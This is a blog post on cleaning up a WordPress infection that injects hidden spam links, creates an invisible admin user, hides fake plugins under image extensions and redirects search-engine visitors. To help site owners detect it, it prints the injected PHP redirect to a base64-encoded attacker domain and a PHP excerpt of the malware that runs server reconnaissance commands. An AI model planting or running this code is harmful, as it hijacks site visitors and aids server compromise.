weBLOG! do YOU?

Well, it’s about a Wordpress exploit based on the website cookie, who is very complex and very good made after my oppinion. It’s enough intelligent to make an SQL injection into the database of the blog, to create an invisible user to those who have javascript enabled on their browsers at a simple check on Dashboard->Users, to verify on the server the directories and files chmoded 777, too lookup and execute files with group and root provilleges. Don’t know the name of the exploit and I see there are quite little articles about it although there are a lot of blogs infected.

I will try to write a little about it and give some advice on how to neutralize it.

What does the exploit do?

First of all it inserts into pages sources invisible links for the visitors but visible and indexable for the search engines, especially Google. In this way, they transfer pagerank to websites given by the attacker. Second, it inserts an redirect code for visitors coming from search engines or from RSS Reader and don’t have the website in a cookie. An antivirus ( Kaspersky in my case ) detects this redirect as Trojan-Clicker.HTML.

Simptoms:

Massive loss of traffic and visitors especially where search engines are giving more than 70% of the visitors.

How to identify?

REMEMBER: First of all backup your database.

1. Verify the source for the index.php, header.php, footer.php files in your theme folder and see if there is a code who uses base64 encoding or contains “if($ser==”1? && sizeof($_COOKIE)==0)” like :

<?php \
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

or something like this. Delete the code.

In the screenshot there is also selected ?“<?php get_header(); >”. This code must remain intact.

2. Using phpMyAdmin go into the database, the wp_users table and check if there is an user without name ( empty on user_nicename row ) created at 00:00:00 0000-00-00 ( it is possible that in the user_login to be written WordPress ). Note down the ID of this user and delete it.

* In this case, the ID is 8.

3. Go to wp_usermeta table in phpMyAdmin, where you find and delete the lines coresponding to the ID of the user you have just deleted.

4. In wp_option table, go to active_plugins and see if there is a plugin ending in images extensions. They may be _old.giff, _old.pngg, _old.jpeg, _new.php.giff, _old.gif, _old.png, _old.jpg, _new.php.gif.

SELECT * FROM wp_options WHERE option_name = ‘active_plugins’

Delete the plugin, go to your blog Administration Panel -> Dasboard -> Plugins where you deactivate and activate a plugin for the fake plugin to be removed from the db.

Find on the FTP or use SSH to find the path indicated in active_plugins and delete the file from the server.

5. Also in phpMyAdmin, in wp_option table, find and delete the row containing rss_f541b3abd05e7962fcab37737f40fad8 and internal_links_cache.

In internal_links_cache, there are coded the spam links that appear in the blog and an adsense ID of the hacker.

6. It is recommended to change your password. If you have more users, change their passwords too or ask them to do the same thing. Replace the files with Wordpress original files! Upgrade to the latest Wordpress version if necessary.

I have tried to explain what to do in this situation to get rid of the virus, but the problem is not resolved yet, because there are used vulnerabilities of the webserver hosting the blog.

First of all check if there are files called *_old* and *_new* on the server with .giff, .jpeg, .pngg, .jpgg extensions. These files must be deleted. ( Found some in wp_includes, tinyMce folder, 5 subfolders below. So it will be aesier if you have SSH access, or just backup and download on the PC the files and search for these files.

Some checking, deleting and securizing for the server ( via SSH )

1. cd /tmp and check for folders like tmpVFlma or combinations like it and delete it. You can see in the screenshot 2 folders of this kind:

rm –rf foldername

2. Check and change the chmod where possible for folders and files chmoded 777:

find all writable files in current dir: find . -type f -perm -2 -ls
find all writable directories in current dir: find . -type d -perm -2 -ls
find all writable directories and files in current dir: find . -perm -2 –ls

3. Lookup for suspected files on the server:

find . -name “*_new.php*”
find . -name “*_old.php*”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”

4. ATTENTION on files who have the bit set to SUID and SGID. These files are executed with group or root privilleges, not with those of the user who executes the file. This files can compromise the root if there are security problems on the server. If you don’t utilise these kind of files execute chmod 0 on them or uninstall the pack containing them.

The exploit has in its source:

if(!$safe_mode){
if($os_type == ‘nix’){
$os .= execute(’sysctl -n kern.ostype’);
$os .= execute(’sysctl -n kern.osrelease’);
$os .= execute(’sysctl -n kernel.ostype’);
$os .= execute(’sysctl -n kernel.osrelease’);
if(empty($user)) $user = execute(’id’);
$aliases = array(
” => ”,
‘find suid files’=>’find / -type f -perm -04000 -ls’,
‘find sgid files’=>’find / -type f -perm -02000 -ls’,
‘find all writable files in current dir’=>’find . -type f -perm -2 -ls’,
‘find all writable directories in current dir’=>’find . -type d -perm -2 -ls’,
‘find all writable directories and files in current dir’=>’find . -perm -2 -ls’,
’show opened ports’=>’netstat -an | grep -i listen’,
);
}else{
$os_name .= execute(’ver’);
$user .= execute(’echo %username%’);
$aliases = array(
” => ”,
’show runing services’ => ‘net start’,
’show process list’ => ‘tasklist’
);
}

In this way, it finds open ports, writable directories/files and is executing files with group/root provilleges.

Will be back with more.

PS: You can check if a blog has problems searching on google:

site:www.yoursitename buy

Enter the page in Cache and View the Source. You’ll be surprised.

Thanks StealthSettings for intro and screenshots ;)